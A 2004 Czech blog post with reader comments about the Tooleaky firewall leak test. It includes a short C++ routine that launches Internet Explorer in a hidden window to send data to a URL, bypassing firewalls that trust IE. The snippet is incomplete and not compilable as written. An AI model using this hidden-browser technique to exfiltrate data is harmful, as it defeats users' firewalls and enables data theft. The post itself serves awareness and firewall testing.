Vaše firewall je s velkou pravděpodobností k ničemu…

MyEgo.cz

home foto blogy mywindows.cz kontakt

Vaše firewall je s velkou pravděpodobností k ničemu…

Bezpečnost 18.09.04

Narazil jsem dnes na takový pěkný malý prográmek, má 3 KB z webu tooleaky.zensoft.com, který krásně ukazuje, proč je Vaše firewall zcela k ničemu. Již dávno jsem psal o tom, že nejen antivirus je k ničemu, ale, že k ničemu je i samotná firewall, pokud není provázána se SandBoxem.

Zkuste si ten prográmek schválně stáhnout a spustit. Stažení i spuštění zabere 10 sekund. Pokud se Vám ukáže “success”, máte problém. Ten prográmek totiž využívá léta známé chyby řady Windows firewallů, a totiž, autorizace přístupu MSIE na internet (nutné třeba pro online Windows Update), a následné zneužití MSIE jinými programy. Stačí na to pár řádků kódu v C++: 

bool TransmitAndReceiveData ( ) {
 // Step 1: Find the MSIE
 char buffer[MAX_PATH + 512];
 long len = sizeof(buffer);
 RegQueryValueA(
 HKEY_LOCAL_MACHINE,
 "SOFTWARE\\Classes\\Applications"+
 "\\iexplore.exe\\shell\\open\\command",
 buffer,
 &len);
 // Step 2: spawn IE in a hidden window
 for ( char*c = &buffer[1]; *c != 0; c++ )
   if ( *c == '%' ) *c = 0;
 z_strcat(buffer, baseURL);
 z_strcat(buffer, outputString);
 WinExec(buffer, SW_HIDE);
 // Step 3: wait for the page to load
 int startCount = GetTickCount();
 do {
   EnumWindows(EnumWindowsProc, 0);
   if ( (GetTickCount() - startCount) > 30000 )
     return false;
 } while ( ieWnd == NULL );
 // Step 4: close the window
 SendMessage(ieWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
 return true;
}

Takto jednoduše může libovolný virus zavolat MSIE, které je autorizováno přistupovat k internetu, a potom libovolně zasílat, co se mu zlíbí. Pěkné, ne? Pokud jste aspoň jednou navštívili s MSIE nějakou warez či porno stránku, spustili si P2P klienta, nebo nějaký “keygen”, jen tak stažený z webu, je docela dost dobře možné, že na počítači máte škůdce. A to škůdce, kterého Vaše firewall nikdy neodhalí, a nezachytí jej ani antivirus či spyware (ty se skutečně nesoustředí na nákazy získané z warez a porno odkazů)…

Microsoftí firewall toto vůbec neumí, Tiny Personal Firewall, mnou preferovaná, to umí, ZoneAlarm Pro to sice umí, ale má to defaultně vypnuté i ve verzi 5.1.

Komentáře

  1. 1 bretik 18.09.04, 06:09:23
    FB

    Mám firewall nastavenou tak, aby žádnej program nemohl pouštět Explorer, takže jsem teoreticky uspěl... Explorer pouštim jen v těch nejkrajnějších případech (optimalizace webu pro IE) :) Cejtim se hned víc v bezpečí, i když mám windows...

  2. 2 Radek 18.09.04, 06:09:51
    FB

    Kerio Personal Firewall se zeptal, jestli chci onomu prográmku povolit spustit IE, což nepovoluji žádnému programu, takže by se nic nestalo.

  3. 3 llook 18.09.04, 07:09:11
    FB

    S tím my Linuxáci problém nemáme. iptables lze jednoduše nastavit tak, že zakáže vše, co nepovolíte.

  4. 4 Honza 18.09.04, 07:09:20
    FB

    Tak jsem byl ja uspesny. Sygate Personal Firewall (velmi podobny Tiny) se zeptal, zda chci pustit IE na nejakou sitenu. Ja rekl, ze ne, a program se za chvili ozval, ze se nelze pripojit. Pokud jsem mu to povolil, ukazal Success. Protoze ale nema IE defautne povolen pristup na internet (pouzivam vyhradne Mozillu, vcetne mailklienta),tak ma po hehe. IE zapinam jen v krajnim pripade, kdyz je treba neco na nem otestovat (web-stranku), ci pokud dana stranka nejde v Mozille nacist.

  5. 5 Michal Tulacek 18.09.04, 07:09:27
    FB

    PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.

    A kde asi myslite ze vznikly historicky prvni viry? :D Pac pocitacovy viry jsou pojem starsi nez windows... (a tim nemyslim jen DOS... prvni program ktery se dal povazovat za virus byl napsany pod unixy...)

  6. 6 maxAV 18.09.04, 07:09:37
    FB

    [4]
    tady presne stejnej vysledek, kerio se me zeptal, jestli chci pustit IE... samozrejme za NECHCI ;-)

  7. 7 Japan 18.09.04, 09:09:08
    FB

    PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.

    treba http://www.root.cz/clanek/124 :_D

  8. 8 Radek Hulán 18.09.04, 09:09:19
    FB

    [7] a co jako? ;-) Ano, virus se dá napsat na jakýkoliv OS, ale poměr Unix versus Windows bude tak 1: 1 milión, zatímco poměr na trhu je trochu jinak..

  9. 9 ls 18.09.04, 10:09:22
    FB

    [8] PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.

    Pisete, ze nemate Windows a pritom v predchozim clanku zminujete koupi DOOMa III, na cem to tedy hrajete? ;-)

  10. 10 Radek Hulán 18.09.04, 10:09:28
    FB

    [9] na Windows XP Pro.. nicméně, jako primární OS používám SuSE Linux 9.1

  11. 11 Andy 18.09.04, 10:09:34
    FB

    [9] No on totiž id svoje hry na linux vydává, já vím určitě že na něm funguje quake3 možná, že teda i doom.

  12. 12 ls 18.09.04, 10:09:36
    FB

    [10] Tak to jo, uz jsem myslel, ze jste jeden z takovych tech zatvrzelych "Linux only" uzivatelu, co v kazdem druhem prispevku basni, ze jejich PC jeste Windows nezazilo a pritom nekde po vecerech pari Dooma III na XPckach. :-)

  13. 13 fonzo 18.09.04, 10:09:47
    FB

    Takze to vyzera tak, ze spominany programek nielenze otestuje firewall, ale vytvara na grc.com databazu, ktore pocitace z tych otestovanych tymto programom su napadnutelne.
    Ktovie, kde ta databaza nakoniec skonci.

  14. 14 Radek Hulán 18.09.04, 10:09:53
    FB

    [13] grc.com je jedna z nejlepších sites na testování bezpečnosti PC, tam ke zneužití rozhodně nedojde... 3 místo ze 3.900.000 stránek na google.com ( http://www.google.com/search?q=firewall+test... )

  15. 15 Ladislav Thon 18.09.04, 11:09:13
    FB

    [6] Taktéž. Kerio Personal Firewall se mne po spuštění prográmku dotáže, zda povolit připojení k grc.com. Cítím se chráněný, i když se mi můj firewall připomíná :-)

  16. 16 Otik 19.09.04, 02:09:39
    FB

    Jak zapnu ochranu v Zone Alarmu? Diky za radu.

  17. 17 jmby 19.09.04, 10:09:33
    FB

    V Zone Alarmu jsem na karte program control vyhledal IE a v kolonce access jsem nastavil otaznik - firewall se bude ptat, jestli muze program pristupovat k inetu. Po spusteni Tooleaky se me sice firewall zeptal, ale aniz bych neco potvrdil, Tooleaky oznamil Success - tak nevim :-/

  18. 18 Pavel@cetoraz 19.09.04, 11:09:10
    FB

    [5] Viry existují pro všechny systémy, to nikdo nepopírá. Ale za to, že je počítač nakažen virem, si může uživatel sám.

    Samozřejmě, když budu tak blbý, že budu v Linuxu všechno dělat jako root, tak si hraju s ohněm. Když budu vše dělat jako uživatel, vir jaksi nemá příliš šancí se šířit.

    Je to jen o tom, jak chce uživatel svůj systém používat, jak ho chce mít stabilní. Ve windows je kdeco s administrátorskými právy (a uživatelé třeba o tom ani neví) a spousta uživatelů má svého uživatele s administrátorskými právy, takže virům nic nebrání v jejich činnosti.

  19. 19 Radek Hulán 19.09.04, 11:09:31
    FB

    [17] to není ono, je to tam nazvené cosi jako "Open Process" a "Advanced Program Control"

  20. 20 dgx 19.09.04, 12:09:48
    FB

    dobrý tip, Radku!

  21. 21 Otik 19.09.04, 05:09:06
    FB

    [17][19] Tak ten "Advanced Program Control" jsem nasel, ale "Open Process" ne. Chova se mi to jako jmbymu.

  22. 22 Kudlanka 20.09.04, 06:09:19
    FB

    Nevim jestli jsem dopadl dobre - tvrdil, ze muj pocitac je prilis pomaly (P4 2,8GHz) nebo me spojeni do internetu prilis pomale (1 mbit) a nebo je grc.com mimo provoz... tak nevim

  23. 23 kokusek 04.10.04, 05:10:31
    FB

    Leaktest stazenej z techto stranek (3kb) mne napsal
    Success! Mam nejakou starsi verzi TinyPF ale ten bohuzel nic nezaregistroval (resp. nic nenabidnul).

    Jinej test ""
    mne vsak pravidlo u TinyPF povolit/zakazat nabidne.
    toz nevim kde je zrada.

    IMHO nazor na ne/pouzivani antiviru nesdilim, jiz
    starej DOS Avast obsahoval "databazi integrity"

  24. 24 kokusek 05.10.04, 09:10:47
    FB

    [23] Ve vyse uvedenem prispevku mne vypadl link takze jeste jednou link na LeakTest v1.2
    http://www.grc.com/lt/leaktest.htm...

  25. 25 Petr 25.11.04, 10:11:34
    FB

    tož nevím, mně ten prográmek napsal success, i když jsem mašinu odpojil od internetu fyzicky. To je skutečně tak dobrý, že dokáže odeslat data i když nemá kudy?

  26. 26 deff 28.11.04, 06:11:12
    FB

    Windosaci: Firewall nefirewall niektori ludia musia pouzivat IE...okna vesmiru dokoran?
    "Bezpecne browsery" su exploitnutelne povacsinou este lahsie ako IE. Mozilla stale obsahuje exploity stare niekolko rokov. O pivo ze exploit na operu je otazka par hodin. Jediny dovod preco sa nevyrabaju masove exploity pre nestandardne browsery je ich male vyuzivanie - a teda maly dopyt na trhu so zombie.

    Linuxaci: Nebudte naivni. Iptables vie hocico len nie obmedzovat pristup programov k netu. To ze niekto nefunguje ako root mu je tak akurat <> platne - s tym kvantom dier v kerneli je od lusera (exploitu v jeho browseri, mail klientovi, multimedia playeri, pdf prehliadaci, mno proste...) k rootovi velmi kratka cesta. Virus je len automatizovany exploit. To ze nepouzivas standarizovany system je len security by obscurity. A naivita.

    Kedysi som cital zaujimavy clanok od par h4x0rov - Total cost of 0wnership.
    Zaver?
    Mac - 1 den prace.
    Windosy - 3 dni.
    "Moderne" linuxy - 6 dni.

    Bezpecnost je proces, nie produkt.
    Ziadna nalepka - s tucniakom, certikom bertikom, ci stevom ballmerom na krabici - bezpecnost nezaruci.

    Vitaj spat v realite.

  27. 27 Jumper77 08.01.05, 03:01:26
    FB

    No zdravim,
    ja by som sa chcel tiez spytat autora, preco tu tolko vychvaluje iba TPF. Ja netvrdim, ze TPF nie je dobry, ale urcite by som nestaval otazku tak, ze jediny schopny firewall je TPF. Ja si napriklad uplne v pohode zijem s Kerio PF, a nakolko mam zalozky NETWORK SECURITY, SYSTEM SECURITY, ATTACKS a WWW, tak si myslim, ze je to splolu s rozumne nastavenymi Windows System Policies dostatocna ochrana proti akemukolvek humusu z netu. A samozrejme pouzivam aj antivirove riesenie. Rad by som, keby ste ma presvedcili o tom, ze existuje nieco, co je mozne dosiahnut iba s TPF a nie s KPF.

  28. 28 pep_in 09.01.05, 10:01:45
    FB

    No asi si myslíte,že když jste prošli tímhle testem,tak to asi bude ok,co? No zkusil jsem jeden z http://www.pcinternetpatrol.com/... stahnul sem si pc audit a spustil ho,docela vás to překvapí,přes kerio firewall se to dostane :-(

  29. 29 waldo q. quux 25.01.05, 03:01:52
    FB

    [3] a zdrojaky pred kompilaci+instalaci overujes pres el.podpis? ;)

  30. 30 Tomas Jedno 17.03.05, 02:03:36
    FB

    Sygate Personal firewall odhalil uspesne hijacking a zakazal IE pristup na net i kdyz byl drive povolen :)

  31. 31 Vask 07.04.05, 05:04:42
    FB

    Zonealarm PC Security Suite s high vysroubovanou ochranou mi spolehlive zahlasila, ze se program pokousi o pristup. Takze OK

  32. 32 lední brtník 17.04.05, 08:04:09
    FB

    [4][6][15] to samé. msie přitom mám v sygate personal firewall povolen pro přístup na net kvůli stupid stránkám bez ptaní, samozřejmě má vypnutý activex. přesto mi firewall vyhodí okno že tooleaky.exe zkouší spustit m$ie.exe - čili neprošel.

  33. 33 Matrix 15.05.05, 12:05:38
    FB

    Chcípáka jménem IE používám v dost zvláštních případech a na tyto ho taky zvlášť povoluju, takže tooleaky setřel :)

  34. 34 DrakMrak 16.09.05, 02:09:44
    FB

    hmmm mám Tiny Firewall a přesto to hlásilo success no je fakt, že mám možná někde něco blbě nastavený ... akorát teda nevím co což mě s.... :-) fakt je že se Tiny ozval když sem ten program pustil což je ok tudíž žádnej cizák se mi jen tak na PC nepustí aby něco provedl... ale když sem mu to dočasně povolil pak už to dopadlo na succes :-) tak nevím jinak IE nepoužívám prakticky vůbec ... jel sem dlouho na Firefoxu bez větších potíží a teď testuju Operu 8.02 mno tady byla docela vychválená ale zatím mi pravidelně jednou denně sestřelí komp .... a vobčas se mi ji nedaří pustit až po restartu systému :-) ale jinak zase se mi líbí tak ještě chvilku vydržím :-)

  35. 35 owoce 16.09.05, 08:09:05
    FB

    Zablokoval jsem v ZoneAlarm přístup MSIE k čemukoliv a vyskočilo okénko, že se nelze připojit, takže já jsem v pohodě

  36. 36 Sakulitarvan 27.10.05, 09:10:35
    FB

    MÁM JEDEN VÁŽNÝ DOTAZ!
    Mě se ukázalo Succes, ale předtím se mi to muselo připojit přes MSIE a k tomu byl potřeba můj souhlas, protože teď používám Firefox. A to mě trápí... Jak mám úplně odstranit MSIE z mého systému, aby nedělal žádné problémy???

  37. 37 geodet 28.10.05, 09:10:48
    FB

    [36] Som uplna lama ale toto by som nedoporucoval. Ak ho definitivne odstrelis z kompu, tak tusim nejdu stahovat updaty... ale nie som si isty. Staci ked mu vo FW bloknes pristup na net natrvalo a dovidenia.

    PS: Radku, skor nez ma zmazete - pisem z Holandska a administrator je magor. Tudiz mam iba anglicku klavesnicu.

  38. 38 Zorg 28.10.05, 12:10:36
    FB

    Výborný tip. Norton Internet Security to umí taky, ale je to defaultně vypnuté. Bohužel to vypadá, že pro tyhle alerty neumí Permit/Block Always, takže asi poletí do koše :-)